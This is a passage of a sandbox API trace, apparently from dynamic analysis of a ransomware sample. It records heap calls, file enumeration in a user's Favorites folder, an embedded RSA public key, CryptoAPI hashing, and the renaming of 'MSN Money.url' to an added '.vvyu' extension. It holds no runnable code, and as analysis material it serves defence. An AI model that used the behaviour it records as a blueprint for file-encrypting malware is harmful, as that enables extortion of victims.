Size=0x8) returned 0x2c378a0 [0189.468] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0189.468] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0189.468] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0189.468] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0189.468] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0189.468] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d399b8 [0189.468] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0189.468] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0189.468] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0189.468] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39988 [0189.468] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0189.468] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39a18 [0189.468] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0189.468] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0189.468] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0189.468] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d399e8 [0189.468] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0189.468] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d399d0 [0189.468] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0189.468] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39a30 [0189.468] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d399d0 | out: hHeap=0x6a0000) returned 1 [0189.468] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d399d0 [0189.468] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d399e8 | out: hHeap=0x6a0000) returned 1 [0189.468] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0189.469] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0189.469] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0189.469] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0189.469] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27b58 [0189.469] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d399a0 | out: hHeap=0x6a0000) returned 1 [0189.469] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d399a0 [0189.469] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0189.469] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3b678 [0189.469] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a00 | out: hHeap=0x6a0000) returned 1 [0189.469] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0189.469] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a30 | out: hHeap=0x6a0000) returned 1 [0189.469] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0189.469] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0189.469] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c31700 [0189.469] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0189.469] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0189.469] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d399a0 | out: hHeap=0x6a0000) returned 1 [0189.469] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0189.470] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0189.470] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0189.470] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0189.470] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0189.471] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0189.471] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0189.471] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0189.471] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0189.472] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0189.472] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0189.472] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0189.472] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0189.472] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d399d0 | out: hHeap=0x6a0000) returned 1 [0189.472] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0189.472] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a18 | out: hHeap=0x6a0000) returned 1 [0189.472] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0189.473] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d399b8 | out: hHeap=0x6a0000) returned 1 [0189.473] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39988 | out: hHeap=0x6a0000) returned 1 [0189.473] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0189.473] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0189.474] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0189.474] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39970 | out: hHeap=0x6a0000) returned 1 [0189.474] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39210 | out: hHeap=0x6a0000) returned 1 [0189.474] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0189.475] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0189.475] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b10 | out: hHeap=0x6a0000) returned 1 [0189.475] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0189.475] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0189.476] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0189.476] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0189.476] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0189.476] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0189.477] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0189.477] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0189.477] WriteFile (in: hFile=0x584, lpBuffer=0x751d68*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x751d68*, lpNumberOfBytesWritten=0x30ffb14*=0x80, lpOverlapped=0x0) returned 1 [0189.477] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x751d68 | out: hHeap=0x6a0000) returned 1 [0189.477] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.478] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0189.478] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0189.478] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.478] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0189.478] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0189.478] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0189.479] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0189.479] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.479] WriteFile (in: hFile=0x584, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0189.479] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0189.479] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0189.480] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0189.480] CloseHandle (hObject=0x584) returned 1 [0189.481] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0189.481] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x880) returned 0x2d42908 [0189.481] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0189.481] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Favorites\\MSN Websites\\MSN Money.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\msn websites\\msn money.url"), lpNewFileName="C:\\Users\\kEecfMwgj\\Favorites\\MSN Websites\\MSN Money.url.vvyu" (normalized: "c:\\users\\keecfmwgj\\favorites\\msn websites\\msn money.url.vvyu")) returned 1 [0189.482] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0189.483] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0189.483] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.485] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x794008 | out: hHeap=0x6a0000) returned 1 [0189.486] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798f9b10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798f9b10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee582f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Sports.url", cAlternateFileName="MSNSPO~1.URL")) returned 1 [0189.486] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.486] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8e) returned 0x794008 [0189.486] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.486] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\MSN Websites\\MSN Sports.url") returned=".url" [0189.486] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Favorites\\MSN Websites\\MSN Sports.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\msn websites\\msn sports.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0189.488] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=133) returned 1 [0189.488] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0189.490] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.490] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0189.491] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0189.492] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0189.492] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0189.492] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x85, lpOverlapped=0x0) returned 1 [0189.492] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.492] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0189.492] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.492] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.492] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0189.493] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0189.493] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0189.493] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0189.494] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0189.494] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0189.494] GetLastError () returned 0x0 [0189.494] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0189.494] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0189.494] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0189.494] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0189.494] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0189.494] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0189.494] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0189.494] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0189.494] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0189.494] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x751d68 [0189.494] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0189.495] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0189.495] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0189.495] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0189.495] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0189.495] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0189.495] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d39210 [0189.495] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39970 [0189.495] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d39258 [0189.495] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39988 [0189.495] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d399b8 [0189.495] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39a18 [0189.495] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d399d0 [0189.495] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0189.495] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0189.495] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3bb48 [0189.495] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0189.496] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d399b8 | out: hHeap=0x6a0000) returned 1 [0189.496] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d399d0 | out: hHeap=0x6a0000) returned 1 [0189.496] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a18 | out: hHeap=0x6a0000) returned 1 [0189.496] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0189.496] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0189.496] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39a18 [0189.496] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37840 [0189.496] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d399d0 [0189.497] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0189.497] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d399b8 [0189.497] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0189.497] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0189.497] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0189.497] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0189.497] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0189.497] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0189.497] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0189.497] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0189.497] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0189.497] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d399d0 | out: hHeap=0x6a0000) returned 1 [0189.497] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0189.498] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d399b8 | out: hHeap=0x6a0000) returned 1 [0189.498] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0189.498] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0189.498] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a18 | out: hHeap=0x6a0000) returned 1 [0189.498] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0189.498] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0189.499] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3bb48 | out: hHeap=0x6a0000) returned 1 [0189.499] GetCurrentThreadId () returned 0x264 [0189.499] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0189.499] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d43ca0 [0189.499] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0189.499] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0189.499] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0189.499] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0189.499] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0189.499] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0189.499] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0189.499] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0189.499] GetCurrentThreadId () returned 0x264 [0189.499] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0189.500] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0189.500] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0189.500] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0189.500] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0189.500] RtlAllocateHeap 